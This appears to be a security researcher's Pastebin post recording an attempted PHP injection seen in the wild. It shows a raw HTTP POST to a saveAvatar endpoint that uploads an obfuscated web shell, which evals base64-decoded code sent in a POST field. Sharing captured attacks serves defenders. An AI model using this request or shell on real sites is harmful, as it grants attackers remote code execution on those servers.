Neonprimetime

PHP Injection attempt

Sep 12th, 2016
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.65 KB | None | 0 0
  1. Malicious PHP Injection attempt
  2. *************
  3. POST/index.php?a=saveAvatar&m=Uc&g=Home&id=1&photoServer=guige.php&type=big   HTTP/1.1
  4. Accept: */*
  5. Content-Type: application/x-www-form-urlencoded
  6. Host: mysite.com
  7. Content-Length: 87
  8. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36
  9. <?php if(isset($_POST["crazy"])){$a=strrev("edoced_46esab");eval($a($_POST["z0"]));} ?>
  10.  
  11. ******
  12. More FROM @neonprimetime security
  13.  
  14. http://pastebin.com/u/Neonprimetime
  15. https://www.virustotal.com/en/USER/neonprimetime/
  16. https://twitter.com/neonprimetime
  17. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment